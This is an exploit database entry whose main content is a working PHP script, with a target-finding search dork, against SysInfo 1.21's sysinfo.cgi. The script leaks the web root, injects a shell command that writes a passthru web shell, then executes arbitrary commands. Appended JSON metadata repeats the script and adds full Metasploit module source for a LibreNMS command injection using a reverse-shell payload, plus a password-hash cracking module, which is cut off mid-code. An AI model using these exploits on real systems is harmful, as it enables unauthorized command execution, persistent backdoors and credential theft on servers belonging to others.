ID 1337DAY-ID-359
Type zdt
Reporter rgod
Modified 2006-04-14T00:00:00
Description
Exploit for cgi platform in category web applications
===========================================================
SysInfo 1.21 (sysinfo.cgi) Remote Command Execution Exploit
===========================================================
#!/usr/bin/php -q -d short_open_tag=on
<?
echo "sysinfo.cgi 1.21 remote cmmnds xctn \r\n";
echo "by rgod [email protected]\r\n";
echo "site: http://retrogod.altervista.org\r\n\r\n";
echo "dork: inurl:sysinfo.cgi ext:cgi\r\n\r\n";
if ($argc<4) {
echo "Usage: php ".$argv[0]." host path cmd OPTIONS\r\n";
echo "host: target server (ip/hostname)\r\n";
echo "path: path to sysinfo.cgi\r\n";
echo "cmd: a shell command\r\n";
echo "Options:\r\n";
echo " -p[port]: specify a port other than 80\r\n";
echo " -P[ip:port]: specify a proxy\r\n";
echo "Examples:\r\n";
echo "php ".$argv[0]." localhost /cgi-bin/sysinfo/ \n";
echo "php ".$argv[0]." localhost /cgi-bin/sysinfo/ ls -la -p81\r\n";
echo "php ".$argv[0]." localhost /cgi-bin/ ls -la -P1.1.1.1:80\r\n";
die;
}
/* tested on sysinfo.cgi v1.21:
http;//[target]/cgi-bin/sysinfo.cgi?action=systemdoc&name=;[some_command]
you don't see any output but you can redirect some shellcode to some file
also you can disclose www path:
http;//[target]/cgi-bin/sysinfo.cgi?action=debugger
*/
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);
function quick_dump($string)
{
$result='';$exa='';$cont=0;
for ($i=0; $i<=strlen($string)-1; $i++)
{
if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
{$result.=" .";}
else
{$result.=" ".$string[$i];}
if (strlen(dechex(ord($string[$i])))==2)
{$exa.=" ".dechex(ord($string[$i]));}
else
{$exa.=" 0".dechex(ord($string[$i]));}
$cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
}
return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacketii($packet)
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='') {
$ock=fsockopen(gethostbyname($host),$port);
if (!$ock) {
echo 'No response from '.$host.':'.$port; die;
}
}
else {
$c = preg_match($proxy_regex,$proxy);
if (!$c) {
echo 'Not a valid proxy...';die;
}
$parts=explode(':',$proxy);
echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
$ock=fsockopen($parts[0],$parts[1]);
if (!$ock) {
echo 'No response from proxy...';die;
}
}
fputs($ock,$packet);
if ($proxy=='') {
$html='';
while (!feof($ock)) {
$html.=fgets($ock);
}
}
else {
$html='';
while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
$html.=fread($ock,1);
}
}
fclose($ock);
#debug
#echo "\r\n".$html;
}
$host=$argv[1];
$path=$argv[2];
$cmd="";$port=80;$proxy="";
for ($i=3; $i<=$argc-1; $i++){
$temp=$argv[$i][0].$argv[$i][1];
if (($temp<>"-p") and ($temp<>"-P"))
{$cmd.=" ".$argv[$i];}
if ($temp=="-p")
{
$port=str_replace("-p","",$argv[$i]);
}
if ($temp=="-P")
{
$proxy=str_replace("-P","",$argv[$i]);
}
}
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
//step 1 -> retrieve application path
$packet ="GET ".$p."sysinfo.cgi?action=debugger HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
#echo quick_dump($packet);
sendpacketii($packet);
$temp=explode("name=\"pfad\" value=\"",$html);
$temp2=explode("\"",$temp[1]);
$pfad=$temp2[0];
if ($pfad=='') {die("cannot retrieve document root...\r\n");}
echo "document root ->".$pfad."\r\n";
//step 2 -> we don't see any output, so let's create a php shell, you know, I'm phpcentric
$temp=";echo \<?php passtrhu\(\\\$_GET[cmd]\)?\> > ".$pfad."/phpinfo.php";
$temp=urlencode($temp);
$packet ="GET ".$p."sysinfo.cgi?action=systemdoc&name=".$temp." HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
#echo quick_dump($packet);
sendpacketii($packet);
//step 3 -> launch commands
$packet ="GET /phpinfo.php?cmd=".urlencode($cmd)." HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
#echo quick_dump($packet);
sendpacketii($packet);
echo $html;
?>
# 0day.today [2018-02-17] #
{"published": "2006-04-14T00:00:00", "id": "1337DAY-ID-359", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [{"differentElements": ["sourceHref", "sourceData", "href"], "edition": 1, "lastseen": "2016-04-20T01:42:05", "bulletin": {"published": "2006-04-14T00:00:00", "id": "1337DAY-ID-359", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [], "enchantments": {"score": {"value": 5.5, "modified": "2016-04-20T01:42:05"}}, "hash": "28f88d483b05a0bbe6194a97e9d197bbb228dc9c1012c39f99b986d271f6587b", "description": "Exploit for cgi platform in category web applications", "type": "zdt", "lastseen": "2016-04-20T01:42:05", "edition": 1, "title": "SysInfo 1.21 (sysinfo.cgi) Remote Command Execution Exploit", "href": "http://0day.today/exploit/description/359", "modified": "2006-04-14T00:00:00", "bulletinFamily": "exploit", "viewCount": 10, "cvelist": [], "sourceHref": "http://0day.today/exploit/359", "references": [], "reporter": "rgod", "sourceData": "===========================================================\r\nSysInfo 1.21 (sysinfo.cgi) Remote Command Execution Exploit\r\n===========================================================\r\n\r\n\r\n\r\n\r\n#!/usr/bin/php -q -d short_open_tag=on\r\n<?\r\necho \"sysinfo.cgi 1.21 remote cmmnds xctn \\r\\n\";\r\necho \"by rgod rgod@autistici.org\\r\\n\";\r\necho \"site: http://retrogod.altervista.org\\r\\n\\r\\n\";\r\necho \"dork: inurl:sysinfo.cgi ext:cgi\\r\\n\\r\\n\";\r\n\r\nif ($argc<4) {\r\necho \"Usage: php \".$argv[0].\" host path cmd OPTIONS\\r\\n\";\r\necho \"host: target server (ip/hostname)\\r\\n\";\r\necho \"path: path to sysinfo.cgi\\r\\n\";\r\necho \"cmd: a shell command\\r\\n\";\r\necho \"Options:\\r\\n\";\r\necho \" -p[port]: specify a port other than 80\\r\\n\";\r\necho \" -P[ip:port]: specify a proxy\\r\\n\";\r\necho \"Examples:\\r\\n\";\r\necho \"php \".$argv[0].\" localhost /cgi-bin/sysinfo/ \\n\";\r\necho \"php \".$argv[0].\" localhost /cgi-bin/sysinfo/ ls -la -p81\\r\\n\";\r\necho \"php \".$argv[0].\" localhost /cgi-bin/ ls -la -P1.1.1.1:80\\r\\n\";\r\ndie;\r\n}\r\n\r\n/* tested on sysinfo.cgi v1.21:\r\n\r\n http;//[target]/cgi-bin/sysinfo.cgi?action=systemdoc&name=;[some_command]\r\n\r\n you don't see any output but you can redirect some shellcode to some file\r\n\r\n also you can disclose www path:\r\n\r\n http;//[target]/cgi-bin/sysinfo.cgi?action=debugger\r\n\t\t\t\t\t\t\t\t\t */\r\nerror_reporting(0);\r\nini_set(\"max_execution_time\",0);\r\nini_set(\"default_socket_timeout\",5);\r\n\r\nfunction quick_dump($string)\r\n{\r\n $result='';$exa='';$cont=0;\r\n for ($i=0; $i<=strlen($string)-1; $i++)\r\n {\r\n if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))\r\n {$result.=\" .\";}\r\n else\r\n {$result.=\" \".$string[$i];}\r\n if (strlen(dechex(ord($string[$i])))==2)\r\n {$exa.=\" \".dechex(ord($string[$i]));}\r\n else\r\n {$exa.=\" 0\".dechex(ord($string[$i]));}\r\n $cont++;if ($cont==15) {$cont=0; $result.=\"\\r\\n\"; $exa.=\"\\r\\n\";}\r\n }\r\n return $exa.\"\\r\\n\".$result;\r\n}\r\n$proxy_regex = '(\\b\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\:\\d{1,5}\\b)';\r\nfunction sendpacketii($packet)\r\n{\r\n global $proxy, $host, $port, $html, $proxy_regex;\r\n if ($proxy=='') {\r\n $ock=fsockopen(gethostbyname($host),$port);\r\n if (!$ock) {\r\n echo 'No response from '.$host.':'.$port; die;\r\n }\r\n }\r\n else {\r\n\t$c = preg_match($proxy_regex,$proxy);\r\n if (!$c) {\r\n echo 'Not a valid proxy...';die;\r\n }\r\n $parts=explode(':',$proxy);\r\n echo \"Connecting to \".$parts[0].\":\".$parts[1].\" proxy...\\r\\n\";\r\n $ock=fsockopen($parts[0],$parts[1]);\r\n if (!$ock) {\r\n echo 'No response from proxy...';die;\r\n\t}\r\n }\r\n fputs($ock,$packet);\r\n if ($proxy=='') {\r\n $html='';\r\n while (!feof($ock)) {\r\n $html.=fgets($ock);\r\n }\r\n }\r\n else {\r\n $html='';\r\n while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {\r\n $html.=fread($ock,1);\r\n }\r\n }\r\n fclose($ock);\r\n #debug\r\n #echo \"\\r\\n\".$html;\r\n}\r\n\r\n$host=$argv[1];\r\n$path=$argv[2];\r\n$cmd=\"\";$port=80;$proxy=\"\";\r\n\r\nfor ($i=3; $i<=$argc-1; $i++){\r\n$temp=$argv[$i][0].$argv[$i][1];\r\nif (($temp<>\"-p\") and ($temp<>\"-P\"))\r\n{$cmd.=\" \".$argv[$i];}\r\nif ($temp==\"-p\")\r\n{\r\n $port=str_replace(\"-p\",\"\",$argv[$i]);\r\n}\r\nif ($temp==\"-P\")\r\n{\r\n $proxy=str_replace(\"-P\",\"\",$argv[$i]);\r\n}\r\n}\r\n\r\nif (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}\r\nif ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}\r\n\r\n//step 1 -> retrieve application path\r\n$packet =\"GET \".$p.\"sysinfo.cgi?action=debugger HTTP/1.0\\r\\n\";\r\n$packet.=\"Host: \".$host.\"\\r\\n\";\r\n$packet.=\"Connection: Close\\r\\n\\r\\n\";\r\n#echo quick_dump($packet);\r\nsendpacketii($packet);\r\n$temp=explode(\"name=\\\"pfad\\\" value=\\\"\",$html);\r\n$temp2=explode(\"\\\"\",$temp[1]);\r\n$pfad=$temp2[0];\r\nif ($pfad=='') {die(\"cannot retrieve document root...\\r\\n\");}\r\necho \"document root ->\".$pfad.\"\\r\\n\";\r\n\r\n\r\n//step 2 -> we don't see any output, so let's create a php shell, you know, I'm phpcentric\r\n$temp=\";echo \\<?php passtrhu\\(\\\\\\$_GET[cmd]\\)?\\> > \".$pfad.\"/phpinfo.php\";\r\n$temp=urlencode($temp);\r\n$packet =\"GET \".$p.\"sysinfo.cgi?action=systemdoc&name=\".$temp.\" HTTP/1.0\\r\\n\";\r\n$packet.=\"Host: \".$host.\"\\r\\n\";\r\n$packet.=\"Connection: Close\\r\\n\\r\\n\";\r\n#echo quick_dump($packet);\r\nsendpacketii($packet);\r\n\r\n//step 3 -> launch commands\r\n$packet =\"GET /phpinfo.php?cmd=\".urlencode($cmd).\" HTTP/1.0\\r\\n\";\r\n$packet.=\"Host: \".$host.\"\\r\\n\";\r\n$packet.=\"Connection: Close\\r\\n\\r\\n\";\r\n#echo quick_dump($packet);\r\nsendpacketii($packet);\r\necho $html;\r\n?>\r\n\r\n\r\n\n# 0day.today [2016-04-20] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "e046949df31fc1824643bc869e2983fe", "key": "modified"}, {"hash": "810ecb2ef37210833f0536b341b147a9", "key": "sourceData"}, {"hash": "980ee7dc8600290f4d13f1f46c609aca", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "705e4a86f7d8115ba39badec1b887add", "key": "description"}, {"hash": "e046949df31fc1824643bc869e2983fe", "key": "published"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "7a4567f1accd64946c1ad5e56e6c5bc6", "key": "title"}, {"hash": "4fed0d8b7a47738c0ff917619635fba3", "key": "sourceHref"}, {"hash": "5d7e29811c87ed83936a31ccde4cdf65", "key": "href"}], "objectVersion": "1.0"}}], "description": "Exploit for cgi platform in category web applications", "hash": "52f9b316a81971e3a47ac2ec1d014fc89fcb1895ed825e215903bd450530e6b4", "enchantments": {"score": {"value": -0.5, "vector": "NONE", "modified": "2018-02-17T21:31:00"}, "dependencies": {"references": [{"type": "packetstorm", "idList": ["PACKETSTORM:153078"]}, {"type": "zdt", "idList": ["1337DAY-ID-32801", "1337DAY-ID-32652", "1337DAY-ID-32287", "1337DAY-ID-31462", "1337DAY-ID-30511", "1337DAY-ID-30347", "1337DAY-ID-29906", "1337DAY-ID-29629", "1337DAY-ID-29512", "1337DAY-ID-28869"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/MISC/IBM_MQ_CHANNEL_BRUTE"]}, {"type": "seebug", "idList": ["SSV:97208"]}, {"type": "nessus", "idList": ["SLACKWARE_SSA_2017-266-02.NASL", "F5_BIGIP_SOL52320548.NASL", "MACOSX_SECUPD_10_11_6_2017-002__10_10_5_2017-002.NASL"]}, {"type": "slackware", "idList": ["SSA-2017-266-02"]}, {"type": "f5", "idList": ["F5:K52320548"]}, {"type": "exploitdb", "idList": ["EDB-ID:42466"]}], "modified": "2018-02-17T21:31:00"}, "vulnersScore": -0.5}, "type": "zdt", "lastseen": "2018-02-17T21:31:00", "edition": 2, "title": "SysInfo 1.21 (sysinfo.cgi) Remote Command Execution Exploit", "href": "https://0day.today/exploit/description/359", "modified": "2006-04-14T00:00:00", "bulletinFamily": "exploit", "viewCount": 41, "cvelist": [], "sourceHref": "https://0day.today/exploit/359", "references": [], "reporter": "rgod", "sourceData": "===========================================================\r\nSysInfo 1.21 (sysinfo.cgi) Remote Command Execution Exploit\r\n===========================================================\r\n\r\n\r\n\r\n\r\n#!/usr/bin/php -q -d short_open_tag=on\r\n<?\r\necho \"sysinfo.cgi 1.21 remote cmmnds xctn \\r\\n\";\r\necho \"by rgod [email\u00a0protected]\\r\\n\";\r\necho \"site: http://retrogod.altervista.org\\r\\n\\r\\n\";\r\necho \"dork: inurl:sysinfo.cgi ext:cgi\\r\\n\\r\\n\";\r\n\r\nif ($argc<4) {\r\necho \"Usage: php \".$argv[0].\" host path cmd OPTIONS\\r\\n\";\r\necho \"host: target server (ip/hostname)\\r\\n\";\r\necho \"path: path to sysinfo.cgi\\r\\n\";\r\necho \"cmd: a shell command\\r\\n\";\r\necho \"Options:\\r\\n\";\r\necho \" -p[port]: specify a port other than 80\\r\\n\";\r\necho \" -P[ip:port]: specify a proxy\\r\\n\";\r\necho \"Examples:\\r\\n\";\r\necho \"php \".$argv[0].\" localhost /cgi-bin/sysinfo/ \\n\";\r\necho \"php \".$argv[0].\" localhost /cgi-bin/sysinfo/ ls -la -p81\\r\\n\";\r\necho \"php \".$argv[0].\" localhost /cgi-bin/ ls -la -P1.1.1.1:80\\r\\n\";\r\ndie;\r\n}\r\n\r\n/* tested on sysinfo.cgi v1.21:\r\n\r\n http;//[target]/cgi-bin/sysinfo.cgi?action=systemdoc&name=;[some_command]\r\n\r\n you don't see any output but you can redirect some shellcode to some file\r\n\r\n also you can disclose www path:\r\n\r\n http;//[target]/cgi-bin/sysinfo.cgi?action=debugger\r\n\t\t\t\t\t\t\t\t\t */\r\nerror_reporting(0);\r\nini_set(\"max_execution_time\",0);\r\nini_set(\"default_socket_timeout\",5);\r\n\r\nfunction quick_dump($string)\r\n{\r\n $result='';$exa='';$cont=0;\r\n for ($i=0; $i<=strlen($string)-1; $i++)\r\n {\r\n if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))\r\n {$result.=\" .\";}\r\n else\r\n {$result.=\" \".$string[$i];}\r\n if (strlen(dechex(ord($string[$i])))==2)\r\n {$exa.=\" \".dechex(ord($string[$i]));}\r\n else\r\n {$exa.=\" 0\".dechex(ord($string[$i]));}\r\n $cont++;if ($cont==15) {$cont=0; $result.=\"\\r\\n\"; $exa.=\"\\r\\n\";}\r\n }\r\n return $exa.\"\\r\\n\".$result;\r\n}\r\n$proxy_regex = '(\\b\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\:\\d{1,5}\\b)';\r\nfunction sendpacketii($packet)\r\n{\r\n global $proxy, $host, $port, $html, $proxy_regex;\r\n if ($proxy=='') {\r\n $ock=fsockopen(gethostbyname($host),$port);\r\n if (!$ock) {\r\n echo 'No response from '.$host.':'.$port; die;\r\n }\r\n }\r\n else {\r\n\t$c = preg_match($proxy_regex,$proxy);\r\n if (!$c) {\r\n echo 'Not a valid proxy...';die;\r\n }\r\n $parts=explode(':',$proxy);\r\n echo \"Connecting to \".$parts[0].\":\".$parts[1].\" proxy...\\r\\n\";\r\n $ock=fsockopen($parts[0],$parts[1]);\r\n if (!$ock) {\r\n echo 'No response from proxy...';die;\r\n\t}\r\n }\r\n fputs($ock,$packet);\r\n if ($proxy=='') {\r\n $html='';\r\n while (!feof($ock)) {\r\n $html.=fgets($ock);\r\n }\r\n }\r\n else {\r\n $html='';\r\n while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {\r\n $html.=fread($ock,1);\r\n }\r\n }\r\n fclose($ock);\r\n #debug\r\n #echo \"\\r\\n\".$html;\r\n}\r\n\r\n$host=$argv[1];\r\n$path=$argv[2];\r\n$cmd=\"\";$port=80;$proxy=\"\";\r\n\r\nfor ($i=3; $i<=$argc-1; $i++){\r\n$temp=$argv[$i][0].$argv[$i][1];\r\nif (($temp<>\"-p\") and ($temp<>\"-P\"))\r\n{$cmd.=\" \".$argv[$i];}\r\nif ($temp==\"-p\")\r\n{\r\n $port=str_replace(\"-p\",\"\",$argv[$i]);\r\n}\r\nif ($temp==\"-P\")\r\n{\r\n $proxy=str_replace(\"-P\",\"\",$argv[$i]);\r\n}\r\n}\r\n\r\nif (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}\r\nif ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}\r\n\r\n//step 1 -> retrieve application path\r\n$packet =\"GET \".$p.\"sysinfo.cgi?action=debugger HTTP/1.0\\r\\n\";\r\n$packet.=\"Host: \".$host.\"\\r\\n\";\r\n$packet.=\"Connection: Close\\r\\n\\r\\n\";\r\n#echo quick_dump($packet);\r\nsendpacketii($packet);\r\n$temp=explode(\"name=\\\"pfad\\\" value=\\\"\",$html);\r\n$temp2=explode(\"\\\"\",$temp[1]);\r\n$pfad=$temp2[0];\r\nif ($pfad=='') {die(\"cannot retrieve document root...\\r\\n\");}\r\necho \"document root ->\".$pfad.\"\\r\\n\";\r\n\r\n\r\n//step 2 -> we don't see any output, so let's create a php shell, you know, I'm phpcentric\r\n$temp=\";echo \\<?php passtrhu\\(\\\\\\$_GET[cmd]\\)?\\> > \".$pfad.\"/phpinfo.php\";\r\n$temp=urlencode($temp);\r\n$packet =\"GET \".$p.\"sysinfo.cgi?action=systemdoc&name=\".$temp.\" HTTP/1.0\\r\\n\";\r\n$packet.=\"Host: \".$host.\"\\r\\n\";\r\n$packet.=\"Connection: Close\\r\\n\\r\\n\";\r\n#echo quick_dump($packet);\r\nsendpacketii($packet);\r\n\r\n//step 3 -> launch commands\r\n$packet =\"GET /phpinfo.php?cmd=\".urlencode($cmd).\" HTTP/1.0\\r\\n\";\r\n$packet.=\"Host: \".$host.\"\\r\\n\";\r\n$packet.=\"Connection: Close\\r\\n\\r\\n\";\r\n#echo quick_dump($packet);\r\nsendpacketii($packet);\r\necho $html;\r\n?>\r\n\r\n\r\n\n# 0day.today [2018-02-17] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "705e4a86f7d8115ba39badec1b887add", "key": "description"}, {"hash": "d540995d88d9c9be9621d23a33c61f0e", "key": "href"}, {"hash": "e046949df31fc1824643bc869e2983fe", "key": "modified"}, {"hash": "e046949df31fc1824643bc869e2983fe", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "980ee7dc8600290f4d13f1f46c609aca", "key": "reporter"}, {"hash": "ad1187a0bb3a578d421438160684ccee", "key": "sourceData"}, {"hash": "89489db3e8c9b5675ad81e87d4c4ffb0", "key": "sourceHref"}, {"hash": "7a4567f1accd64946c1ad5e56e6c5bc6", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "objectVersion": "1.3"}
{"metasploit": [{"lastseen": "2019-11-23T12:25:56", "bulletinFamily": "exploit", "description": "This module exploits a command injection vulnerability in the open source network management software known as LibreNMS. The community parameter used in a POST request to the addhost functionality is unsanitized. This parameter is later used as part of a shell command that gets passed to the popen function in capture.inc.php, which can result in execution of arbitrary code. This module requires authentication to LibreNMS first.\n", "modified": "2019-06-04T17:24:00", "published": "2019-05-29T23:30:39", "id": "MSF:EXPLOIT/LINUX/HTTP/LIBRENMS_ADDHOST_CMD_INJECT", "href": "", "type": "metasploit", "title": "LibreNMS addhost Command Injection", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'LibreNMS addhost Command Injection',\n 'Description' => %q(\n This module exploits a command injection vulnerability in the open source\n network management software known as LibreNMS. The community parameter used\n in a POST request to the addhost functionality is unsanitized. This parameter\n is later used as part of a shell command that gets passed to the popen function\n in capture.inc.php, which can result in execution of arbitrary code.\n\n This module requires authentication to LibreNMS first.\n ),\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'mhaskar', # Vulnerability discovery and PoC\n 'Shelby Pace' # Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2018-20434' ],\n [ 'URL', 'https://shells.systems/librenms-v1-46-remote-code-execution-cve-2018-20434/' ],\n [ 'URL', 'https://gist.github.com/mhaskar/516df57aafd8c6e3a1d70765075d372d' ]\n ],\n 'Arch' => ARCH_CMD,\n 'Targets' =>\n [\n [ 'Linux',\n {\n 'Platform' => 'unix',\n 'DefaultOptions' => { 'Payload' => 'cmd/unix/reverse' }\n }\n ]\n ],\n 'DisclosureDate' => '2018-12-16',\n 'DefaultTarget' => 0\n ))\n\n register_options(\n [\n OptString.new('TARGETURI', [ true, 'Base LibreNMS path', '/' ]),\n OptString.new('USERNAME', [ true, 'User name for LibreNMS', '' ]),\n OptString.new('PASSWORD', [ true, 'Password for LibreNMS', '' ])\n ])\n end\n\n def login\n login_uri = normalize_uri(target_uri.path, 'login')\n res = send_request_cgi('method' => 'GET', 'uri' => login_uri)\n fail_with(Failure::NotFound, 'Failed to access the login page') unless res && res.code == 200\n\n cookies = res.get_cookies\n\n login_res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => login_uri,\n 'cookie' => cookies,\n 'vars_post' =>\n {\n 'username' => datastore['USERNAME'],\n 'password' => datastore['PASSWORD']\n }\n )\n\n fail_with(Failure::NoAccess, 'Failed to submit credentials to login page') unless login_res && login_res.code == 302\n\n cookies = login_res.get_cookies\n res = send_request_cgi('method' => 'GET', 'uri' => normalize_uri(target_uri.path), 'cookie' => cookies)\n fail_with(Failure::NoAccess, 'Failed to log into LibreNMS') unless res && res.code == 200 && res.body.include?('Devices')\n\n print_status('Successfully logged into LibreNMS. Storing credentials...')\n store_valid_credential(user: datastore['USERNAME'], private: datastore['PASSWORD'])\n login_res.get_cookies\n end\n\n def add_device(cookies)\n add_uri = normalize_uri(target_uri.path, 'addhost')\n @hostname = Rex::Text.rand_text_alpha(6...12)\n comm_payload = \"'; #{payload.encoded}#'\"\n\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => add_uri,\n 'cookie' => cookies,\n 'vars_post' =>\n {\n 'snmp' => 'on',\n 'force_add' => 'on',\n 'snmpver' => 'v2c',\n 'hostname' => @hostname,\n 'community' => comm_payload,\n 'authalgo' => 'MD5',\n 'cryptoalgo' => 'AES',\n 'transport' => 'udp',\n 'port_assoc_mode' => 'ifIndex'\n }\n )\n\n fail_with(Failure::NotFound, 'Failed to add device') unless res && res.body.include?('Device added')\n print_good(\"Successfully added device with hostname #{@hostname}\")\n\n host_id = res.get_html_document.search('div[@class=\"alert alert-success\"]/a[@href]').text\n fail_with(Failure::NotFound, \"Couldn't retrieve the id for the device\") if host_id.empty?\n host_id = host_id.match(/(\\d+)/).nil? ? nil : host_id.match(/(\\d+)/)\n\n fail_with(Failure::NotFound, 'Failed to retrieve a valid device id') if host_id.nil?\n\n host_id\n end\n\n def del_device(id, cookies)\n del_uri = normalize_uri(target_uri.path, 'delhost')\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => del_uri,\n 'cookie' => cookies,\n 'vars_post' =>\n {\n 'id' => id,\n 'confirm' => 1\n }\n )\n\n print_status('Unsure if device was deleted. No response received') unless res\n\n if res.body.include?(\"Removed device #{@hostname.downcase}\")\n print_good(\"Successfully deleted device with hostname #{@hostname} and id ##{id}\")\n else\n print_status('Failed to delete device. Manual deletion may be needed')\n end\n end\n\n def exploit\n exp_uri = normalize_uri(target_uri.path, 'ajax_output.php')\n cookies = login\n\n host_id = add_device(cookies)\n send_request_cgi(\n 'method' => 'GET',\n 'uri' => exp_uri,\n 'cookie' => cookies,\n 'vars_get' =>\n {\n 'id' => 'capture',\n 'format' => 'text',\n 'type' => 'snmpwalk',\n 'hostname' => @hostname\n }\n )\n\n del_device(host_id, cookies)\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/http/librenms_addhost_cmd_inject.rb"}, {"lastseen": "2019-11-08T04:28:34", "bulletinFamily": "exploit", "description": "This module uses a John the Ripper or Hashcat .pot file to crack any password hashes in the creds database instantly. JtR's --show functionality is used to help combine all the passwords into an easy to use format.\n", "modified": "2019-04-05T00:50:52", "published": "2019-02-03T15:17:25", "id": "MSF:AUXILIARY/ANALYZE/APPLY_POT", "href": "", "type": "metasploit", "title": "Apply Pot File To Hashes", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/auxiliary/password_cracker'\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Auxiliary::PasswordCracker\n\n def initialize\n super(\n 'Name' => 'Apply Pot File To Hashes',\n 'Description' => %Q{\n This module uses a John the Ripper or Hashcat .pot file to crack any password\n hashes in the creds database instantly. JtR's --show functionality is used to\n help combine all the passwords into an easy to use format.\n },\n 'Author' => ['h00die'],\n 'License' => MSF_LICENSE\n )\n deregister_options('ITERATION_TIMEOUT')\n deregister_options('CUSTOM_WORDLIST')\n deregister_options('KORELOGIC')\n deregister_options('MUTATE')\n deregister_options('USE_CREDS')\n deregister_options('USE_DB_INFO')\n deregister_options('USE_DEFAULT_WORDLIST')\n deregister_options('USE_ROOT_WORDS')\n deregister_options('USE_HOSTNAMES')\n\n end\n\n # Not all hash formats include an 'id' field, which coresponds which db entry\n # an item is to its hash. This can be problematic, especially when a username\n # is used as a salt. Due to all the variations, we make a small HashLookup\n # class to handle all the fields for easier lookup later.\n class HashLookup\n attr_accessor :db_hash\n attr_accessor :jtr_hash\n attr_accessor :username\n attr_accessor :id\n\n def initialize(db_hash, jtr_hash, username, id)\n @db_hash = db_hash\n @jtr_hash = jtr_hash\n @username = username\n @id = id\n end\n end\n\n def run\n cracker = new_john_cracker\n\n lookups = []\n\n # create one massive hash file with all the hashes\n hashlist = Rex::Quickfile.new(\"hashes_tmp\")\n framework.db.creds(workspace: myworkspace).each do |core|\n next if core.private.type == 'Metasploit::Credential::Password'\n jtr_hash = hash_to_jtr(core)\n hashlist.puts jtr_hash\n lookups << HashLookup.new(core.private.data, jtr_hash, core.public, core.id)\n end\n hashlist.close\n cracker.hash_path = hashlist.path\n print_status \"Hashes Written out to #{hashlist.path}\"\n cleanup_files = [cracker.hash_path]\n\n # cycle through all hash types we dump asking jtr to show us\n # cracked passwords. The advantage to this vs just comparing\n # john.pot to the hashes directly is we use jtr to recombine\n # lanman, and other assorted nuances\n ['bcrypt', 'bsdicrypt', 'crypt', 'descrypt', 'lm', 'nt',\n 'md5crypt', 'mysql', 'mysql-sha1', 'mssql', 'mssql05', 'mssql12',\n 'oracle', 'oracle11', 'oracle12c', 'dynamic_1506', #oracles\n 'dynamic_1034' #postgres\n ].each do |format|\n\n print_status(\"Checking #{format} hashes against pot file\")\n cracker.format = format\n cracker.each_cracked_password do |password_line|\n password_line.chomp!\n next if password_line.blank? || password_line.nil?\n fields = password_line.split(\":\")\n core_id = nil\n case format\n when 'descrypt'\n next unless fields.count >=3\n username = fields.shift\n core_id = fields.pop\n 4.times { fields.pop } # Get rid of extra :\n when 'md5crypt', 'descrypt', 'bsdicrypt', 'crypt', 'bcrypt'\n next unless fields.count >=7\n username = fields.shift\n core_id = fields.pop\n 4.times { fields.pop }\n when 'mssql', 'mssql05', 'mssql12', 'mysql', 